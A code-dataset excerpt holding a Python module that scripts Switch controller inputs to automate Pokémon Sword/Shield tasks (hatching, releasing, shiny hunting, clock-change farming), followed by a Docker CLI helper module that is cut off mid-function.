source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
PythonCommand.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from abc import ABCMeta, abstractclassmethod
from time import sleep
import threading
import Command
import Keys
import cv2
from Keys import Button, Direction, Stick
# the class For notifying stop signal is sent from Main window
class StopThread(Exception):
pass
# Python command
class PythonCommand(Command.Command):
def __init__(self, name):
super(PythonCommand, self).__init__(name)
#print('init Python command: ' + name)
self.keys = None
self.thread = None
self.alive = True
self.postProcess = None
@abstractclassmethod
def do(self):
pass
def do_safe(self, ser):
if self.keys is None:
self.keys = Keys.KeyPress(ser)
try:
if self.alive:
self.do()
self.finish()
except StopThread:
print(self.name + ' has finished successfully.')
except:
if self.keys is None:
self.keys = Keys.KeyPress(ser)
print('interruppt')
import traceback
traceback.print_exc()
self.keys.end()
self.alive = False
def start(self, ser, postProcess=None):
self.alive = True
self.postProcess = postProcess
if not self.thread:
self.thread = threading.Thread(target=self.do_safe, args=(ser,))
self.thread.start()
def end(self, ser):
self.sendStopRequest()
def sendStopRequest(self):
if self.checkIfAlive(): # try if we can stop now
self.alive = False
print(self.name + ': we\'ve sent a stop request.')
# NOTE: Use this function if you want to get out from a command loop by yourself
def finish(self):
self.alive = False
self.end(self.keys.ser)
# press button at duration times(s)
def press(self, buttons, duration=0.1, wait=0.1):
self.keys.input(buttons)
self.wait(duration)
self.keys.inputEnd(buttons)
self.wait(wait)
self.checkIfAlive()
# press button at duration times(s) repeatedly
def pressRep(self, buttons, repeat, duration=0.1, interval=0.1, wait=0.1):
for i in range(0, repeat):
self.press(buttons, duration, 0 if i == repeat - 1 else interval)
self.wait(wait)
# add hold buttons
def hold(self, buttons):
self.keys.hold(buttons)
# release holding buttons
def holdEnd(self, buttons):
self.keys.holdEnd(buttons)
self.checkIfAlive()
# do nothing at wait time(s)
def wait(self, wait):
sleep(wait)
self.checkIfAlive()
def checkIfAlive(self):
if not self.alive:
self.keys.end()
self.keys = None
self.thread = None
if not self.postProcess is None:
self.postProcess()
self.postProcess = None
# raise exception for exit working thread
raise StopThread('exit successfully')
else:
return True
# Python command using rank match glitch
class RankGlitchPythonCommand(PythonCommand):
def __init__(self, name):
super(RankGlitchPythonCommand, self).__init__(name)
self.day = 0
# Use time glitch
# Controls the system time and get every-other-day bonus without any punishments
def timeLeap(self, is_go_back=True):
self.press(Button.HOME, wait=1)
self.press(Direction.DOWN)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Button.A, wait=1.5) # System Settings
self.press(Direction.DOWN, duration=2, wait=0.5)
self.press(Button.A, wait=0.3) # System Settings > System
self.press(Direction.DOWN)
self.press(Direction.DOWN)
self.press(Direction.DOWN)
self.press(Direction.DOWN, wait=0.3)
self.press(Button.A, wait=0.2) # Date and Time
self.press(Direction.DOWN, duration=0.7, wait=0.2)
# increment and decrement
if is_go_back:
self.press(Button.A, wait=0.2)
self.press(Direction.UP, wait=0.2) # Increment a year
self.press(Direction.RIGHT, duration=1.5)
self.press(Button.A, wait=0.5)
self.press(Button.A, wait=0.2)
self.press(Direction.LEFT, duration=1.5)
self.press(Direction.DOWN, wait=0.2) # Decrement a year
self.press(Direction.RIGHT, duration=1.5)
self.press(Button.A, wait=0.5)
# use only increment
# for use of faster time leap
else:
self.press(Button.A, wait=0.2)
self.press(Direction.RIGHT)
self.press(Direction.UP, wait=0.2) # increment a day
self.press(Direction.RIGHT, duration=1)
self.press(Button.A, wait=0.5)
self.press(Button.HOME, wait=1)
self.press(Button.HOME, wait=1)
TEMPLATE_PATH = "./Template/"
class ImageProcPythonCommand(PythonCommand):
def __init__(self, name, cam):
super(ImageProcPythonCommand, self).__init__(name)
self.camera = cam
# Judge if current screenshot contains an image using template matching
# It's recommended that you use gray_scale option unless the template color wouldn't be cared for performace
# 現在のスクリーンショットと指定した画像のテンプレートマッチングを行います
# 色の違いを考慮しないのであればパフォーマンスの点からuse_grayをTrueにしてグレースケール画像を使うことを推奨します
def isContainTemplate(self, template_path, threshold=0.7, use_gray=True, show_value=False):
src = self.camera.readFrame()
src = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY) if use_gray else src
template = cv2.imread(TEMPLATE_PATH+template_path, cv2.IMREAD_GRAYSCALE if use_gray else cv2.IMREAD_COLOR)
w, h = template.shape[1], template.shape[0]
method = cv2.TM_CCOEFF_NORMED
res = cv2.matchTemplate(src, template, method)
_, max_val, _, max_loc = cv2.minMaxLoc(res)
if show_value:
print(template_path + ' ZNCC value: ' + str(max_val))
if max_val > threshold:
if use_gray:
src = cv2.cvtColor(src, cv2.COLOR_GRAY2BGR)
top_left = max_loc
bottom_right = (top_left[0] + w, top_left[1] + h)
cv2.rectangle(src, top_left, bottom_right, (255, 0, 255), 2)
return True
else:
return False
# Get interframe difference binarized image
# フレーム間差分により2値化された画像を取得
def getInterframeDiff(self, frame1, frame2, frame3, threshold):
diff1 = cv2.absdiff(frame1, frame2)
diff2 = cv2.absdiff(frame2, frame3)
diff = cv2.bitwise_and(diff1, diff2)
# binarize
img_th = cv2.threshold(diff, threshold, 255, cv2.THRESH_BINARY)[1]
# remove noise
mask = cv2.medianBlur(img_th, 3)
return mask
# Sync as controller
# 同期
class Sync(PythonCommand):
def __init__(self, name):
super(Sync, self).__init__(name)
def do(self):
self.wait(1)
self.press(Button.A, 0.1, 2)
self.press(Button.HOME, 0.1, 1)
self.press(Button.A, 0.1, 0.5)
# Unsync controller
# 同期解除
class Unsync(PythonCommand):
def __init__(self, name):
super(Unsync, self).__init__(name)
def do(self):
self.wait(1)
self.press(Button.HOME, 0.1, 0.5)
self.press(Direction.DOWN, 0.1, 0.1)
self.press(Direction.RIGHT, 0.1, 0.1)
self.press(Direction.RIGHT, 0.1, 0.1)
self.press(Direction.RIGHT, 0.1, 0.1)
self.press(Button.A, 0.1, 1.5)
self.press(Button.A, 0.1, 0.5)
self.press(Button.A, 0.1, 0.3)
# Mash a button A
# A連打
class Mash_A(PythonCommand):
def __init__(self, name):
super(Mash_A, self).__init__(name)
def do(self):
while True:
self.wait(0.5)
self.press(Button.A)
# Auto league
# 自動リーグ周回(画像認識なし)
class AutoLeague(PythonCommand):
def __init__(self, name):
super(AutoLeague, self).__init__(name)
def do(self):
self.hold(Direction(Stick.LEFT, 70))
while True:
self.wait(0.5)
for _ in range(0, 10):
self.press(Button.A, wait=0.5)
self.press(Button.B)
# using Rank Battle glitch
# Infinity ID lottery
# 無限IDくじ(ランクマッチ使用)
class InfinityLottery(RankGlitchPythonCommand):
def __init__(self, name):
super(InfinityLottery, self).__init__(name)
def do(self):
while True:
self.press(Button.A, wait=0.5)
self.press(Button.B, wait=0.5)
self.press(Direction.DOWN, wait=0.5)
for _ in range(0, 10): # A loop
self.press(Button.A, wait=0.5)
for _ in range(0, 20): # B loop
self.press(Button.B, wait=0.5)
# Time glitch
self.timeLeap()
# using RankBattle glitch
# Infinity getting berries
# 無限きのみ(ランクマッチ, 画像認識任意)
class InfinityBerry(ImageProcPythonCommand, RankGlitchPythonCommand):
def __init__(self, name, cam):
super(InfinityBerry, self).__init__(name, cam)
self.cam = cam
def do(self):
while True:
# If camera is not opened, then pick 1 and timeleap
if not self.cam.isOpened():
self.press(Button.A, wait=0.5)
self.press(Button.B, wait=0.5)
self.press(Button.A, wait=0.5) # yes
for _ in range(0, 15): # B loop
self.press(Button.B, wait=0.5)
# Time glitch
self.timeLeap()
else:
self.press(Button.A, wait=0.5)
self.press(Button.B, wait=0.5)
self.press(Button.A, wait=0.5) # yes
while True:
self.press(Button.A, wait=0.5) # for press 'shake more'
self.press(Button.A, wait=0.5) # just in case
self.press(Button.A, wait=0.5)
while not self.isContainTemplate('fell_message.png'):
self.press(Button.B, wait=0.5)
print('fell message!')
self.press(Button.A, wait=0.5)
# Judge continuity by tree shaking motion
if self.isContinue():
print('continue')
self.wait(0.5)
continue
else:
print('not continue')
break
for _ in range(0, 10): # B loop
self.press(Button.B, wait=0.5)
# Time glitch
self.timeLeap()
def isContinue(self, check_interval=0.1, check_duration=2):
time = 0
zero_cnt = 0
height_half = int(self.camera.capture_size[1] / 2)
frame1 = cv2.cvtColor(self.camera.readFrame()[0:height_half-1, :], cv2.COLOR_BGR2GRAY)
sleep(check_interval / 3)
frame2 = cv2.cvtColor(self.camera.readFrame()[0:height_half-1, :], cv2.COLOR_BGR2GRAY)
sleep(check_interval / 3)
frame3 = cv2.cvtColor(self.camera.readFrame()[0:height_half-1, :], cv2.COLOR_BGR2GRAY)
while time < check_duration:
mask = self.getInterframeDiff(frame1, frame2, frame3, 15)
zero_cnt += cv2.countNonZero(mask)
frame1 = frame2
frame2 = frame3
sleep(check_interval)
frame3 = cv2.cvtColor(self.camera.readFrame()[0:height_half-1, :], cv2.COLOR_BGR2GRAY)
time += check_interval
print('diff cnt: ' + str(zero_cnt))
# zero count threshold is heuristic value... weather: sunny
return True if zero_cnt < 9000 else False
# using RankBattle glitch
# Auto cafe battles
# 無限カフェ(ランクマッチ使用)
class InfinityCafe(RankGlitchPythonCommand):
def __init__(self, name):
super(InfinityCafe, self).__init__(name)
self.pp_max = 10
def do(self):
while True:
# battle agaist a master at PP times
for __ in range(0, self.pp_max):
self.wait(1)
for _ in range(0, 35): # A loop
self.press(Button.A, wait=0.5)
self.wait(5)
for _ in range(0, 45): # B loop
self.press(Button.B, wait=0.5)
self.timeLeap()
# go to pokemon center to restore PP
self.press(Direction.DOWN, duration=3.5)
self.press(Button.X, wait=1)
self.press(Button.A, wait=3) # open up a map
self.press(Button.A, wait=1)
self.press(Button.A, wait=4)
self.press(Direction.UP, duration=0.2)
self.press(Direction.UP_LEFT, duration=1, wait=2)
# in pokemon center
self.press(Direction.UP, duration=2)
for _ in range(0, 10): # A loop
self.press(Button.A, wait=0.5)
for _ in range(0, 15): # B loop
self.press(Button.B, wait=0.5)
self.press(Direction.DOWN, duration=2, wait=2)
# move to cafe in Wyndon (Shoot City)
self.press(Direction.LEFT, duration=3)
self.press(Direction.UP, duration=4)
self.press(Direction.RIGHT, duration=1 ,wait=2)
self.press(Direction.UP, duration=2, wait=1)
# auto releasing pokemons
class AutoRelease(ImageProcPythonCommand):
def __init__(self, name, cam):
super(AutoRelease, self).__init__(name, cam)
self.row = 5
self.col = 6
self.cam = cam
def do(self):
self.wait(0.5)
for i in range(0, self.row):
for j in range(0, self.col):
if not self.cam.isOpened():
self.Release()
else:
# if shiny, then skip
if not self.isContainTemplate('shiny_mark.png', threshold=0.9):
if self.isContainTemplate('status.png', threshold=0.7): # Maybe this threshold works for only Japanese version.
# Release a pokemon
self.Release()
if not j == self.col - 1:
if i % 2 == 0: self.press(Direction.RIGHT, wait=0.2)
else: self.press(Direction.LEFT, wait=0.2)
self.press(Direction.DOWN, wait=0.2)
# Return from pokemon box
self.press(Button.B, wait=2)
self.press(Button.B, wait=2)
self.press(Button.B, wait=1.5)
def Release(self):
self.press(Button.A, wait=0.5)
self.press(Direction.UP, wait=0.2)
self.press(Direction.UP, wait=0.2)
self.press(Button.A, wait=1)
self.press(Direction.UP, wait=0.2)
self.press(Button.A, wait=1.5)
self.press(Button.A, wait=0.3)
# Egg hatching at count times
# 指定回数の孵化(キャプボあり)
class CountHatching(ImageProcPythonCommand):
def __init__(self, name, cam):
super(CountHatching, self).__init__(name, cam)
self.hatched_num = 0
self.count = 5
self.place = 'wild_area'
def do(self):
while self.hatched_num < self.count:
if self.hatched_num == 0:
self.press(Direction.RIGHT, duration=1)
self.hold([Direction.RIGHT, Direction.R_LEFT])
# turn round and round
while not self.isContainTemplate('egg_notice.png'):
self.wait(1)
print('egg hatching')
self.holdEnd([Direction.RIGHT, Direction.R_LEFT])
self.press(Button.A)
self.wait(15)
for i in range(0, 5):
self.press(Button.A, wait=1)
self.hatched_num += 1
print('hatched_num: ' + str(self.hatched_num))
# auto egg hatching using image recognition
# 自動卵孵化(キャプボあり)
class AutoHatching(ImageProcPythonCommand):
def __init__(self, name, cam):
super(AutoHatching, self).__init__(name, cam)
self.cam = cam
self.party_num = 1 # don't count eggs
self.hatched_num = 0
self.hatched_box_num = 0
self.itr_max = 6
def do(self):
self.press(Direction.DOWN, duration=0.05, wait=1)
self.press(Direction.DOWN, duration=0.8)
self.press(Direction.LEFT, duration=0.2)
while True:
for i in range(0, self.itr_max):
print('iteration: ' + str(i+1) + ' (' + str(i*5) + '/30) -> (' + str((i+1)*5) + '/30)')
print('hatched box num : ' + str(self.hatched_box_num))
self.getNewEgg()
self.press(Direction.UP, duration=0.05, wait=0.5)
self.press(Direction.UP, duration=1)
# hatch eggs
while self.party_num < 6:
self.press(Direction.RIGHT, duration=1)
self.hold([Direction.RIGHT, Direction.R_LEFT])
# turn round and round
while not self.isContainTemplate('egg_notice.png'):
self.wait(1)
print('egg hatching')
self.holdEnd([Direction.RIGHT, Direction.R_LEFT])
self.press(Button.A)
self.wait(15)
for j in range(0, 5):
self.press(Button.A, wait=1)
self.hatched_num += 1
self.party_num += 1
print('party_num: ' + str(self.party_num))
print('all hatched num: ' + str(self.hatched_num))
self.press(Button.X, wait=1)
self.press(Button.A, wait=3) # open up a map
self.press(Button.A, wait=1)
self.press(Button.A, wait=4)
self.press(Direction.DOWN, duration=0.05, wait=0.5)
self.press(Direction.DOWN, duration=0.8)
self.press(Direction.LEFT, duration=0.2)
if self.party_num < 6:
# get a new egg
self.getNewEgg()
self.press(Direction.UP, duration=0.05, wait=0.5)
self.press(Direction.UP, duration=1)
# open up pokemon box
self.press(Button.X, wait=1)
self.press(Direction.RIGHT, wait=0.5) # set cursor to party
self.press(Button.A, wait=2)
self.press(Button.R, wait=2)
self.putPokemonsToBox(start=1, num=5)
self.party_num = 1
if i < self.itr_max - 1:
self.press(Button.B, wait=0.5)
self.press(Button.B, wait=2)
self.press(Button.B, wait=2)
self.press(Direction.LEFT, wait=0.2) # set cursor to map
self.press(Button.B, wait=1.5)
self.hatched_box_num += 1
# release
self.press(Button.B, wait=0.8)
self.press(Button.Y, wait=0.2)
self.press(Direction.DOWN, wait=0.3)
self.press(Direction.DOWN, wait=0.3)
# As of now, stop if shiny is in box
is_contain_shiny = self.ReleaseBox()
if is_contain_shiny:
print('shiny!')
break
self.press(Button.B, wait=0.5)
self.press(Button.B, wait=2)
self.press(Button.B, wait=2)
self.press(Direction.LEFT, wait=0.2) # set cursor to map
self.press(Button.B, wait=1.5)
def getNewEgg(self):
self.press(Button.A, wait=0.5)
if not self.isContainTemplate('egg_found.png'):
print('egg not found')
self.finish() # TODO
print('egg found')
self.press(Button.A, wait=1)
self.press(Button.A, wait=1)
self.press(Button.A, wait=3)
self.press(Button.A, wait=2)
self.press(Button.A, wait=2)
self.press(Button.A, wait=1)
def putPokemonsToBox(self, start=0, num=1):
self.press(Direction.LEFT, wait=0.3)
self.pressRep(Direction.DOWN, start, wait=0.3)
# select by range
self.press(Button.Y, wait=0.2)
self.press(Button.Y, wait=0.2)
self.press(Button.A, wait=0.2)
self.pressRep(Direction.DOWN, num-1)
self.press(Button.A, wait=0.2)
# put to box
self.pressRep(Direction.UP, 3)
self.press(Direction.RIGHT, wait=0.2)
self.press(Button.A, wait=0.5)
self.press(Button.A, wait=0.5)
def ReleaseBox(self):
row = 5
col = 6
for i in range(0, row):
for j in range(0, col):
# if shiny, then stop
if self.isContainTemplate('shiny_mark.png', threshold=0.9):
return True
# Maybe this threshold works for only Japanese version.
if self.isContainTemplate('status.png', threshold=0.7):
# Release a pokemon
self.Release()
if not j == col - 1:
if i % 2 == 0: self.press(Direction.RIGHT, wait=0.2)
else: self.press(Direction.LEFT, wait=0.2)
self.press(Direction.DOWN, wait=0.2)
return False
def Release(self):
self.press(Button.A, wait=0.5)
self.press(Direction.UP, wait=0.2)
self.press(Direction.UP, wait=0.2)
self.press(Button.A, wait=1)
self.press(Direction.UP, wait=0.2)
self.press(Button.A, wait=1.5)
self.press(Button.A, wait=0.3)
# for debug
class Debug(ImageProcPythonCommand):
def __init__(self, name, cam):
super(Debug, self).__init__(name, cam)
def do(self):
self.goRound()
def goRound(self):
self.press(Direction.LEFT, duration=0.5)
self.press(Direction.DOWN_LEFT, duration=0.5)
self.press(Direction.DOWN, duration=0.5)
self.press(Direction.DOWN_RIGHT, duration=0.5)
self.press(Direction.RIGHT, duration=0.5)
self.press(Direction.UP_RIGHT, duration=0.5)
self.press(Direction.UP, duration=0.5)
self.press(Direction.UP_LEFT, duration=0.5)
# Get watt automatically using the glitch
# source: MCU Command 'InifinityWatt'
class InfinityWatt(RankGlitchPythonCommand):
def __init__(self, name):
super(InfinityWatt, self).__init__(name)
self.use_rank = True
def do(self):
while True:
self.wait(1)
if self.use_rank:
self.press(Button.A, duration=0.4, wait=0.1)
self.press(Button.A, duration=0.4, wait=0.1) # 2000W
self.press(Button.A, wait=1)
self.press(Button.A, duration=0.1, wait=2.5)
self.press(Button.B, duration=0.3, wait=0.5)
self.timeLeap(False)
self.press(Button.A, wait=4.1)
else:
self.press(Button.A, wait=1)
self.press(Button.A, wait=3) # レイド開始
self.press(Button.HOME, wait=1)
self.press(Direction.DOWN)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Button.A, wait=1.5) # 設定選択
self.press(Direction.DOWN, duration=2, wait=0.5)
self.press(Button.A, wait=0.3) # 設定 > 本体
self.press(Direction.DOWN)
self.press(Direction.DOWN)
self.press(Direction.DOWN)
self.press(Direction.DOWN, wait=0.3)
self.press(Button.A, wait=0.2) # 日付と時刻 選択
self.press(Button.A, wait=0.4)
self.press(Direction.DOWN, wait=0.2)
self.press(Direction.DOWN, wait=0.2)
self.press(Button.A, wait=0.2)
self.press(Direction.UP, wait=0.2)
self.press(Direction.RIGHT, duration=1, wait=0.3)
self.press(Button.A, wait=0.5)
self.press(Button.HOME, wait=1) # ゲームに戻る
self.press(Button.HOME, wait=2)
self.press(Button.B, wait=1)
self.press(Button.A, wait=6) # レイドをやめる
self.press(Button.A, wait=1)
self.press(Button.A, wait=1) # 2000W
self.press(Button.A, wait=1.8)
self.press(Button.B, wait=1.5)
self.press(Button.HOME, wait=1)
self.press(Direction.DOWN)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Button.A, wait=1.5) # 設定選択
self.press(Direction.DOWN, duration=2, wait=0.5)
self.press(Button.A, wait=0.3) # 設定 > 本体
self.press(Direction.DOWN)
self.press(Direction.DOWN)
self.press(Direction.DOWN)
self.press(Direction.DOWN)
self.press(Button.A) # 日付と時刻 選択
self.press(Button.A, wait=0.5)
self.press(Button.HOME, wait=1) # ゲームに戻る
self.press(Button.HOME, wait=1)
class InfinityFeather(RankGlitchPythonCommand):
def __init__(self, name):
super(InfinityFeather, self).__init__(name)
def do(self):
# 時間等確認用。使用する際は "import time" すること
# start = time.time()
# i = 0 # カウンタ
print('Start collecting feathers')
while True:
self.wait(0.75)
# i += 1
# print('Map')
self.press(Button.X, wait=1.5) # open up a map
self.press(Button.A, wait=3.0)
self.press(Direction(Stick.LEFT, 45), duration=0.05) # Select a Pokémon Day Care
self.press(Button.A, wait=1)
self.press(Button.A, wait=4.0)
# print('pick feather')
self.press(Direction.DOWN_RIGHT, duration=0.15)
self.press(Direction.RIGHT, duration=3)
self.press(Button.A, wait=0.3)
self.press(Button.A, wait=0.3)
self.press(Button.A, wait=0.3)
self.press(Button.A, wait=0.3)
# print('Time leap')
self.timeLeap()
# tm = round(time.time() - start, 2)
# print('Loop : {} in {} sec. Average: {} sec/loop'.format(i, tm, round(tm / i, 2)))
class Fossil_shiny(ImageProcPythonCommand):
def __init__(self, name, cam):
super(Fossil_shiny, self).__init__(name, cam)
'''
head = {0 : "カセキのトリ", 1 : "カセキのサカナ"}
body = {0 : "カセキのリュウ", 1 : "カセキのクビナガ"}
'''
def fossil_loop(self, head=0, body=0):
# start = time.time()
i = 0
while True:
for j in range(30):
print(str(30*i+j+1)+"体目 ({}/30 of a box)".format(j+1))
self.press(Button.A, wait=0.75)
self.press(Button.A, wait=0.75)
if head == 1:
self.press(Direction.DOWN, duration=0.07, wait=0.75) # select fossil
self.press(Button.A, wait=0.75) # determine fossil
if body == 1:
self.press(Direction.DOWN, duration=0.07, wait=0.75) # select fossil
self.press(Button.A, wait=0.75) # determine fossil
self.press(Button.A, wait=0.75) # select "それでよければ"
while not self.isContainTemplate('Network_Offline.png', 0.8):
self.press(Button.B, wait=0.5)
self.wait(1.0)
# open up pokemon box
self.press(Button.X, wait=1)
self.press(Direction.RIGHT, duration=0.07, wait=1)
self.press(Button.A, wait=2)
self.press(Button.R, wait=2)
is_contain_shiny = self.CheckBox()
# tm = round(time.time() - start, 2)
# print('Loop : {} in {} sec. Average: {} sec/loop'.format(i, tm, round(tm / i, 2)))
if is_contain_shiny:
print('Shiny!')
break
self.press(Button.HOME, wait=2) # EXIT Game
self.press(Button.X, wait=0.6)
self.press(Button.A, wait=2.5) # closed
self.press(Button.A, wait=2.0) # Choose game
self.press(Button.A) # User selection
while not self.isContainTemplate('OP.png', 0.7): # recognize Opening
self.wait(0.2)
self.press(Button.A) # load save-data
while not self.isContainTemplate('Network_Offline.png', 0.8):
self.wait(0.5)
self.wait(1.0)
i += 1
def CheckBox(self):
row = 5
col = 6
for i in range(0, row):
for j in range(0, col):
# if shiny, then stop
if self.isContainTemplate('shiny_mark.png', threshold=0.9):
return True
# Maybe this threshold works for only Japanese version.
if self.isContainTemplate('status.png', threshold=0.7):
pass
if not j == col - 1:
if i % 2 == 0:
self.press(Direction.RIGHT, wait=0.2)
else:
self.press(Direction.LEFT, wait=0.2)
self.press(Direction.DOWN, wait=0.2)
return False
class Fossil_shiny_00(Fossil_shiny): # パッチラゴン
def __init__(self, name, cam):
super(Fossil_shiny, self).__init__(name, cam)
def do(self):
self.fossil_loop(0, 0)
class Fossil_shiny_01(Fossil_shiny): # パッチルドン
def __init__(self, name, cam):
super(Fossil_shiny, self).__init__(name, cam)
def do(self):
self.fossil_loop(0, 1)
class Fossil_shiny_10(Fossil_shiny): # ウオノラゴン
def __init__(self, name, cam):
super(Fossil_shiny, self).__init__(name, cam)
def do(self):
self.fossil_loop(1, 0)
class Fossil_shiny_11(Fossil_shiny): # ウオチルドン
def __init__(self, name, cam):
super(Fossil_shiny, self).__init__(name, cam)
def do(self):
self.fossil_loop(1, 1)
# sample initial code
# Copy and paste this class and write codes in start method.
# After you write the codes, don't forget to add commands dictionary below.
# このクラスをコピぺしてstartメソッドの続きにコードを書いてください
# コードを書き終わったら, 下のcommands変数に追加するのを忘れないように
class Sample(PythonCommand):
def __init__(self, name):
super(Sample, self).__init__(name)
def do(self):
self.wait(1)
# Perform the Day skip glitch once
class AdvanceFrame(RankGlitchPythonCommand):
def __init__(self, name):
super(AdvanceFrame, self).__init__(name)
self.use_rank = True
def do(self):
if self.checkIfAlive():
self.press(Button.A, duration=0.4, wait=0.1)
self.press(Button.A, duration=0.4, wait=0.1) # 2000W
self.press(Button.A, wait=1)
self.press(Button.A, duration=0.1, wait=2.5)
self.press(Button.B, duration=0.3, wait=0.5)
self.timeLeap(False)
self.press(Button.A, wait=5)
self.finish()
# Perform the Day skip glitch three times
class AdvanceFrameThree(RankGlitchPythonCommand):
def __init__(self, name):
super(AdvanceFrameThree, self).__init__(name)
self.use_rank = True
def do(self):
for _ in range(3):
self.wait(1)
if self.checkIfAlive():
self.press(Button.A, duration=0.4, wait=0.1)
self.press(Button.A, duration=0.4, wait=0.1) # 2000W
self.press(Button.A, wait=1)
self.press(Button.A, duration=0.1, wait=2.5)
self.press(Button.B, duration=0.3, wait=0.5)
self.timeLeap(False)
self.press(Button.A, wait=5)
else:
break
self.finish()
# reset the game
class Reset(PythonCommand):
def __init__(self, name):
super(Reset, self).__init__(name)
def do(self):
self.wait(1)
self.press(Button.HOME, wait=1)
self.press(Button.X, wait=1)
self.press(Button.A, wait=5)
self.press(Button.A, wait=2)
self.press(Button.A, wait=18)
self.press(Button.A, wait=1)
self.finish()
# Add commands you want to use
# 使用したいコマンドをここに追加してください
commands = {
'Mash_A - A連打': Mash_A,
'AutoLeague - 自動リーグ周回': AutoLeague,
'AutoHatching - 仮:自動孵化(画像認識)': AutoHatching,
'CountHatching - 固定数孵化(画像認識)': CountHatching,
'AutoRelease - 自動リリース': AutoRelease,
'InfinityWatt - 無限ワット(ランクマ)': InfinityWatt,
'InfinityLottery - 無限IDくじ(ランクマ)': InfinityLottery,
'InfinityBerry - 無限きのみ(ランクマ)': InfinityBerry,
'InfinityCafe - 無限カフェ(ランクマ)': InfinityCafe,
'??? - 無限羽回収(ランクマ)': InfinityFeather,
'Shiny Fossil 00 - カセキ色厳選(パッチラゴン)': Fossil_shiny_00,
'Shiny Fossil 01 - カセキ色厳選(パッチルドン)': Fossil_shiny_01,
'Shiny Fossil 10 - カセキ色厳選(ウオノラゴン)': Fossil_shiny_10,
'Shiny Fossil 11 - カセキ色厳選(ウオチルドン)': Fossil_shiny_11,
'Debug - デバグ': Debug,
'Advance Frame - Seed Search': AdvanceFrame,
'Advance Frame By 3 - Seed Search': AdvanceFrameThree,
'Reset': Reset,
}
# Add commands as utility you want to use
# ユーティリティとして使用したいコマンドを追加してください
utils = {
'Sync - コントローラ同期': Sync,
'Unsync - コントローラ同期解除': Unsync,
}
|
utils.py
|
import os
import subprocess
from pathlib import Path
from queue import Queue
from subprocess import PIPE, Popen
from threading import Thread
from typing import Any, Dict, Iterable, List, Optional, Tuple, Union
import pydantic
PROJECT_ROOT = Path(__file__).parents[1]
def title_if_necessary(string: str):
if string.isupper():
return string
else:
return string.title()
def to_docker_camel(string):
try:
special_cases = {
"exec_ids": "ExecIDs",
"sandbox_id": "SandboxID",
"oom_killed": "OOMKilled",
"rw": "RW",
"link_local_ipv6_address": "LinkLocalIPv6Address",
"link_local_ipv6_prefix_lenght": "LinkLocalIPv6PrefixLen",
"secondary_ipv6_addresses": "SecondaryIPv6Addresses",
"endpoint_id": "EndpointID",
"global_ipv6_prefix_lenght": "GlobalIPv6PrefixLen",
"ip_adress": "IPAddress",
"ip_prefix_lenght": "IPPrefixLen",
"ipv6_gateway": "IPv6Gateway",
"network_id": "NetworkID",
"ip_address": "IPAddress",
"global_ipv6_address": "GlobalIPv6Address",
"blkio_device_read_iops": "BlkioDeviceReadIOps",
"blkio_device_write_iops": "BlkioDeviceWriteIOps",
"device_ids": "DeviceIDs",
"kernel_memory_tcp": "KernelMemoryTCP",
"container_id_file": "ContainerIDFile",
"uts_mode": "UTSMode",
"root_fs": "RootFS",
"enable_ipv6": "EnableIPv6",
"ipv4_address": "IPv4Address",
"ipv6_address": "IPv6Address",
"ipam": "IPAM",
"tls_info": "TLSInfo",
"virtual_ips": "VirtualIPs",
}
return special_cases[string]
except KeyError:
return "".join(title_if_necessary(x) for x in string.split("_"))
class DockerCamelModel(pydantic.BaseModel):
class Config:
alias_generator = to_docker_camel
allow_population_by_field_name = True
class DockerException(Exception):
def __init__(
self,
command_launched: List[str],
return_code: int,
stdout: Optional[bytes] = None,
stderr: Optional[bytes] = None,
):
command_launched_str = " ".join(command_launched)
error_msg = (
f"The docker command executed was `{command_launched_str}`.\n"
f"It returned with code {return_code}\n"
)
if stdout is not None:
error_msg += f"The content of stdout is '{stdout.decode()}'\n"
else:
error_msg += (
"The content of stdout can be found above the "
"stacktrace (it wasn't captured).\n"
)
if stderr is not None:
error_msg += f"The content of stderr is '{stderr.decode()}'\n"
else:
error_msg += (
"The content of stderr can be found above the "
"stacktrace (it wasn't captured)."
)
super().__init__(error_msg)
def run(
args: List[Any],
capture_stdout: bool = True,
capture_stderr: bool = True,
input: bytes = None,
return_stderr: bool = False,
env: Dict[str, str] = {},
) -> Union[str, Tuple[str, str]]:
args = [str(x) for x in args]
subprocess_env = dict(os.environ)
subprocess_env.update(env)
if args[1] == "buildx":
subprocess_env["DOCKER_CLI_EXPERIMENTAL"] = "enabled"
if capture_stdout:
stdout_dest = subprocess.PIPE
else:
stdout_dest = None
if capture_stderr:
stderr_dest = subprocess.PIPE
else:
stderr_dest = None
if os.environ.get("PYTHON_ON_WHALES_DEBUG", "0") == "1":
print("------------------------------")
print("command: " + " ".join(args))
print(f"Env: {subprocess_env}")
print("------------------------------")
completed_process = subprocess.run(
args, input=input, stdout=stdout_dest, stderr=stderr_dest, env=subprocess_env
)
if completed_process.returncode != 0:
raise DockerException(
args,
completed_process.returncode,
completed_process.stdout,
completed_process.stderr,
)
if return_stderr:
return (
post_process_stream(completed_process.stdout),
post_process_stream(completed_process.stderr),
)
else:
return post_process_stream(completed_process.stdout)
def post_process_stream(stream: Optional[bytes]):
if stream is None:
return ""
stream = stream.decode()
if len(stream) != 0 and stream[-1] == "\n":
stream = stream[:-1]
return stream
ValidPath = Union[str, Path]
def to_list(x) -> list:
if isinstance(x, list):
return x
else:
return [x]
# backport of https://docs.python.org/3.9/library/stdtypes.html#str.removesuffix
def removesuffix(string: str, suffix: str) -> str:
if string.endswith(suffix):
return string[: -len(suffix)]
else:
return string
def removeprefix(string: str, prefix: str) -> str:
if string.startswith(prefix):
return string[len(prefix) :]
else:
return string
def reader(pipe, pipe_name, queue):
try:
with pipe:
for line in iter(pipe.readline, b""):
queue.put((pipe_name, line))
finally:
queue.put(None)
def stream_stdout_and_stderr(full_cmd: list) -> Iterable[Tuple[str, bytes]]:
full_cmd = list(map(str, full_cmd))
process = Popen(full_cmd, stdout=PIPE, stderr=PIPE)
q = Queue()
full_stderr = b"" # for the error message
Thread(target=reader, args=[process.stdout, "stdout", q]).start()
Thread(target=reader, args=[process.stderr, "stderr", q]).start()
for _ in range(2):
for source, line in iter(q.get, None):
